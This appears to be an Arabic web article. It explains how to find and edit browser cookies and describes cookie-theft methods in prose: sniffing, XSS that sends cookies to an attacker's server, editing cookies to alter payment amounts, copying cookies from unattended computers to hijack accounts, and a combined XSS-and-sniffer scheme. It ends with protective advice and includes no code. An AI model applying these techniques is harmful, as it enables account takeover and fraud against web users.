افتح القائمة الرئيسية في Opera، وانتقل إلى قسم "الإعدادات" وحدد سطر "الإعدادات العامة...". أو يمكنك ببساطة الضغط على مفاتيح التشغيل السريع CTRL + F12. سيؤدي هذا إلى فتح نافذة إعدادات المتصفح، حيث تحتاج في علامة التبويب "خيارات متقدمة" إلى النقر فوق قسم "ملفات تعريف الارتباط" في اللوحة اليسرى. تحتاج فيه إلى النقر فوق الزر "إدارة ملفات تعريف الارتباط".

في Mozilla FireFox، افتح قسم "الأدوات" في القائمة وحدد "الإعدادات". في نافذة الإعدادات، يتعين عليك الانتقال إلى علامة التبويب "الخصوصية"، والعثور على الزر الذي يشير إلى "إظهار ملفات تعريف الارتباط..." والنقر فوقه للوصول إلى قائمة ملفات تعريف الارتباط المخزنة بواسطة المتصفح. يمكنك البحث عنها ومشاهدتها هنا.

في Internet Explorer، قم بتوسيع قسم "الأدوات" في القائمة وحدد "الخصائص". في نافذة إعدادات الخصائص، انتقل إلى علامة التبويب "عام" وانقر على زر "خيارات" في قسم "سجل التصفح". بهذه الطريقة، ستفتح نافذة أخرى ("خيارات الملفات المؤقتة")، والتي تحتاج فيها إلى النقر فوق الزر "إظهار الملفات".

انقر فوق عنوان "الاسم" في قائمة محتويات مجلد تخزين الملفات المؤقتة في Internet Explorer الذي يتم فتحه - وبهذه الطريقة يمكنك تجميع كافة ملفات تعريف الارتباط في كتلة واحدة في كومة مشتركة من الملفات غير المتجانسة. هنا يمكنك العثور على الملف الذي يهمك وفتحه في برنامج "المفكرة" القياسي للعرض أو التحرير.

في Google Chrome، انقر فوق رمز مفتاح الربط الموجود في الزاوية اليمنى العليا من النافذة وحدد "خيارات" من القائمة. سيفتح المتصفح صفحة "الإعدادات"، وتقوم بالنقر فوق الرابط "خيارات متقدمة" في اللوحة اليسرى، وفي صفحة الإعدادات المتقدمة، انقر فوق الزر "إعدادات المحتوى". هذه ليست الصفحة الأخيرة في الطريق إلى ملفات تعريف الارتباط المخزنة بواسطة هذا المتصفح.

انقر فوق الزر "جميع ملفات تعريف الارتباط وبيانات الموقع" في الصفحة التالية وستتمكن أخيرًا من الوصول إلى قائمة ملفات تعريف الارتباط.

يوفر Google Chrome القدرة على البحث عن ملفات تعريف الارتباط وعرضها وحذفها.

في متصفح Safari، انقر على رمز الترس في الزاوية اليمنى العليا وحدد "الإعدادات...". في نافذة تغيير الإعدادات، يجب عليك الانتقال إلى علامة التبويب "الأمان" والنقر فوق الزر "إظهار ملفات تعريف الارتباط" هناك. يوفر Safari وظائف للبحث عن ملفات تعريف الارتباط وحذفها فقط؛ ولا يمكن رؤية محتويات هذه الملفات المؤقتة إلا جزئيًا هنا.

بسكويت- المعلومات على شكل ملف نصي محفوظ على جهاز الكمبيوتر الخاص بالمستخدم بواسطة الموقع. يحتوي على بيانات المصادقة (تسجيل الدخول/كلمة المرور، المعرف، رقم الهاتف، عنوان صندوق البريد)، إعدادات المستخدم، حالة الوصول. المخزنة في ملف تعريف المتصفح.

اختراق ملفات تعريف الارتباطهي سرقة (أو "اختطاف") لجلسة زائر مورد الويب. تصبح المعلومات الخاصة متاحة ليس فقط للمرسل والمستلم، ولكن أيضًا لطرف ثالث - الشخص الذي قام بالاعتراض.

أدوات وتقنيات اختراق ملفات تعريف الارتباط

لصوص الكمبيوتر، مثل زملائهم في الحياة الحقيقية، بالإضافة إلى المهارات والبراعة والمعرفة، بالطبع، لديهم أيضًا أدواتهم الخاصة - نوع من ترسانة المفاتيح الرئيسية والتحقيقات. دعونا نلقي نظرة على الحيل الأكثر شيوعًا التي يستخدمها المتسللون لاستخراج ملفات تعريف الارتباط من مستخدمي الإنترنت.

المتشممون

برامج خاصة لرصد وتحليل حركة مرور الشبكة. اسمهم يأتي من الفعل الإنجليزي "شم" (شم)، لأنه. حرفيًا "استنشاق" الحزم المنقولة بين العقد.

لكن المهاجمين يستخدمون أداة الشم لاعتراض بيانات الجلسة والرسائل والمعلومات السرية الأخرى. أهداف هجماتهم هي في الأساس شبكات غير محمية، حيث يتم إرسال ملفات تعريف الارتباط في جلسة HTTP مفتوحة، أي أنها غير مشفرة عمليًا. (شبكة Wi-Fi العامة هي الأكثر عرضة للخطر في هذا الصدد.)

لتضمين أداة الشم في قناة الإنترنت بين عقدة المستخدم وخادم الويب، يتم استخدام الطرق التالية:

• "الاستماع" إلى واجهات الشبكة (المحاور والمحولات)؛
• التفرع ونسخ حركة المرور.
• الاتصال بفجوة قناة الشبكة؛
• التحليل من خلال الهجمات الخاصة التي تعيد توجيه حركة مرور الضحية إلى المتشمم (انتحال MAC، انتحال IP).

يشير الاختصار XSS إلى البرمجة النصية للمواقع المتقاطعة. يستخدم لمهاجمة مواقع الويب لسرقة بيانات المستخدم.

مبدأ XSS هو كما يلي:

• يقوم المهاجم بإدخال تعليمات برمجية ضارة (برنامج نصي مقنع خاص) في صفحة ويب خاصة بموقع ويب أو منتدى أو في رسالة (على سبيل المثال، عند المراسلة على شبكة اجتماعية)؛
• ينتقل الضحية إلى الصفحة المصابة ويقوم بتنشيط الكود المثبت على جهاز الكمبيوتر الخاص به (النقر، اتباع الرابط، وما إلى ذلك)؛
• وبدوره، "يستخرج" الكود الخبيث الذي تم تنفيذه البيانات السرية للمستخدم من المتصفح (على وجه الخصوص، ملفات تعريف الارتباط) ويرسلها إلى خادم الويب الخاص بالمهاجم.

من أجل "زرع" آلية XSS البرمجية، يستخدم المتسللون جميع أنواع نقاط الضعف في خوادم الويب والخدمات عبر الإنترنت والمتصفحات.

تنقسم جميع ثغرات XSS إلى نوعين:

• سلبي.يتم الحصول على الهجوم عن طريق طلب برنامج نصي محدد على صفحة ويب. يمكن إدخال تعليمات برمجية ضارة في نماذج مختلفة على صفحة ويب (على سبيل المثال، في شريط بحث الموقع). الأكثر عرضة لـ XSS السلبي هي الموارد التي لا تقوم بتصفية علامات HTML عند وصول البيانات؛
• نشيط.تقع مباشرة على الخادم. ويتم تفعيلها في متصفح الضحية. يتم استخدامها بشكل نشط من قبل المحتالين في جميع أنواع المدونات والمحادثات وموجزات الأخبار.

يقوم المتسللون "بتمويه" نصوص XSS الخاصة بهم بعناية حتى لا يشك الضحية في أي شيء. يقومون بتغيير امتداد الملف، وتمرير الكود كصورة، وتحفيزهم على اتباع الرابط، وجذبهم بمحتوى مثير للاهتمام. نتيجة لذلك: يرسل مستخدم الكمبيوتر الشخصي، غير القادر على التحكم في فضوله، بيده (بنقرة ماوس) ملفات تعريف الارتباط للجلسة (مع تسجيل الدخول وكلمة المرور!) إلى مؤلف البرنامج النصي XSS - شرير الكمبيوتر.

استبدال ملفات تعريف الارتباط

يتم حفظ جميع ملفات تعريف الارتباط وإرسالها إلى خادم الويب (الذي "أتت منه") دون أي تغييرات - في شكلها الأصلي - بنفس القيم والسلاسل والبيانات الأخرى. ويسمى التعديل المتعمد لمعلماتها باستبدال ملفات تعريف الارتباط. بمعنى آخر، عند استبدال ملفات تعريف الارتباط، يتظاهر المهاجم بالتمني. على سبيل المثال، عند إجراء الدفع في متجر عبر الإنترنت، يغير ملف تعريف الارتباط مبلغ الدفع إلى الأسفل - وبالتالي يحدث "توفير" في المشتريات.

يتم "إدراج" ملفات تعريف الارتباط المسروقة للجلسة على شبكة التواصل الاجتماعي من حساب شخص آخر في جلسة أخرى وعلى جهاز كمبيوتر آخر. يحصل مالك ملفات تعريف الارتباط المسروقة على حق الوصول الكامل إلى حساب الضحية (المراسلات والمحتوى وإعدادات الصفحة) طالما أنها موجودة على صفحتها.

يتم تنفيذ ملفات تعريف الارتباط "التحريرية" باستخدام:

• وظائف "إدارة ملفات تعريف الارتباط..." في متصفح Opera؛
• مدير ملفات تعريف الارتباط والإضافات المتقدمة لمدير ملفات تعريف الارتباط لمتصفح فايرفوكس؛
• أدوات IECookiesView المساعدة (Internet Explorer فقط)؛
• محرر نصوص مثل AkelPad أو NotePad أو Windows Notepad.

الوصول المادي إلى البيانات

مخطط تنفيذ بسيط للغاية، يتكون من عدة خطوات. ولكنها تكون فعالة فقط إذا تم ترك جهاز الكمبيوتر الخاص بالضحية ذو الجلسة المفتوحة، على سبيل المثال فكونتاكتي، دون مراقبة (ولفترة طويلة!):

يتم إدخال وظيفة جافا سكريبت في شريط عنوان المتصفح لعرض جميع ملفات تعريف الارتباط المحفوظة.

بعد الضغط على "ENTER" تظهر جميعها على الصفحة.

يتم نسخ ملفات تعريف الارتباط وحفظها في ملف ثم نقلها إلى محرك أقراص فلاش.

على جهاز كمبيوتر آخر، يتم استبدال ملفات تعريف الارتباط في جلسة جديدة.

يتم منح الوصول إلى حساب الضحية.

كقاعدة عامة، يستخدم المتسللون الأدوات المذكورة أعلاه (+ أدوات أخرى) معًا (نظرًا لأن مستوى الحماية في العديد من موارد الويب مرتفع جدًا) وبشكل منفصل (عندما يكون المستخدمون ساذجين بشكل مفرط).

XSS + الشم

يتم إنشاء برنامج نصي XSS، والذي يحدد عنوان المتسلل عبر الإنترنت (إما محلي الصنع أو خدمة معينة).

يتم حفظ التعليمات البرمجية الضارة بالملحق .img (تنسيق الصورة).

يتم بعد ذلك تحميل هذا الملف إلى صفحة موقع ويب أو دردشة أو رسالة شخصية - حيث سيتم تنفيذ الهجوم.

يتم لفت انتباه المستخدم إلى "الفخ" الذي تم إنشاؤه (وهذا هو المكان الذي تدخل فيه الهندسة الاجتماعية حيز التنفيذ).

إذا تم تشغيل المصيدة، فسيتم اعتراض ملفات تعريف الارتباط من متصفح الضحية بواسطة المتشمم.

يفتح المهاجم سجلات الشم ويسترد ملفات تعريف الارتباط المسروقة.

بعد ذلك، يقوم بإجراء استبدال للحصول على حقوق صاحب الحساب باستخدام الأدوات المذكورة أعلاه.

حماية ملفات تعريف الارتباط من القرصنة

استخدم اتصالاً مشفرًا (باستخدام البروتوكولات وطرق الأمان المناسبة).

لا تستجيب للروابط أو الصور أو العروض المغرية المشكوك فيها لتتعرف على "البرمجيات المجانية الجديدة". وخاصة من الغرباء.

استخدم فقط موارد الويب الموثوقة.

قم بإنهاء الجلسة المعتمدة بالنقر فوق الزر "تسجيل الخروج" (وليس فقط إغلاق علامة التبويب!). خاصة إذا قمت بتسجيل الدخول إلى حسابك ليس من جهاز كمبيوتر شخصي، ولكن، على سبيل المثال، من جهاز كمبيوتر في مقهى إنترنت.

لا تستخدم ميزة "حفظ كلمة المرور" الخاصة بالمتصفح. تزيد بيانات التسجيل المخزنة من خطر السرقة بشكل كبير. لا تكن كسولًا، ولا تضيع بضع دقائق من الوقت في إدخال كلمة المرور الخاصة بك وتسجيل الدخول في بداية كل جلسة.

بعد تصفح الويب - زيارة الشبكات الاجتماعية والمنتديات والمحادثات ومواقع الويب - احذف ملفات تعريف الارتباط المحفوظة وامسح ذاكرة التخزين المؤقت للمتصفح.

قم بتحديث المتصفحات وبرامج مكافحة الفيروسات بانتظام.

استخدم ملحقات المتصفح التي تحمي من هجمات XSS (على سبيل المثال، NoScript for FF وGoogle Chrome).

بشكل دوري في الحسابات.

والأهم من ذلك، ألا تفقد يقظتك وانتباهك أثناء الاسترخاء أو العمل على الإنترنت!